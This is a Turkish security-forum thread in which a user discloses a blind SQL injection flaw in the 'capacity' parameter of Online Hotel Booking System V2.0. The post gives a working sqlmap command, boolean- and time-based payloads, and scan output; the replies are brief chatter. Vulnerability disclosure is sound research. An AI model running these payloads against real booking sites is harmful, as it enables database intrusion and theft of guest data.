İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

Online Hotel Booking System - Blind SQL Injection / Pentester

09-05-2017 14:18
#1
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Bug Search kapsamındaki çalışmamdır. "Online Hotel Booking System V2.0 " scripti üzerinde Blind SQL İnjection zafiyeti tarafımca tespit edilmiştir. Videou olarak anlatımınıda yaptım.

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : Online Hotel Booking System V2.0 
# Vulnerable Type : Boolean-Based Blind SQL njection & Time-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/hotel-booking/
# Author: Siber Gvenlik Akademisi - Pentester
# Date: 08.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: http://localhost/hotel-booking/booking-search.php
# Proof of concept:
sqlmap -u "http://localhost/hotel-booking/booking-search.php/" --data="check_in=05%2F09%2F2017&check_out=05%2F16%2F2017&capacity=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND 3025=3025

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND SLEEP(5)
---
[15:39:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.12

< ------------------- header data end of ------------------- >
Link:
https://cxsecurity.com/issue/WLB-2017050054

VİDEO:

Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.

09-05-2017 14:46
#2
Üyelik tarihi:
04/2015
Nereden:
SGA
Yaş:
20
Mesajlar:
5.048
Teşekkür (Etti):
2327
Teşekkür (Aldı):
1549
Konular:
281
Eline sağlık. Bilgisayarın masaüstü sanırım, fanlar anlık olarak çıldırıyor da
Kullanıcı İmzası
"Saian kurşun geçirmez Cadillac gibi"
Pentester Teşekkür etti.
09-05-2017 14:48
#3
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Alıntı:
KurokoTetsuya´isimli üyeden Alıntı Mesajı göster
Eline sağlık. Bilgisayarın masaüstü sanırım, fanlar anlık olarak çıldırıyor da
Yok ya, dizüstü bilgisayar
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
09-05-2017 14:49
#4
UzmanConda - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2015
Yaş:
19
Mesajlar:
341
Teşekkür (Etti):
48
Teşekkür (Aldı):
19
Konular:
79
güncell
09-05-2017 14:50
#5
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Alıntı:
UzmanConda´isimli üyeden Alıntı Mesajı göster
güncell
Konu zaten güncel ilginç yorum, neyse teşekkür ederim
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı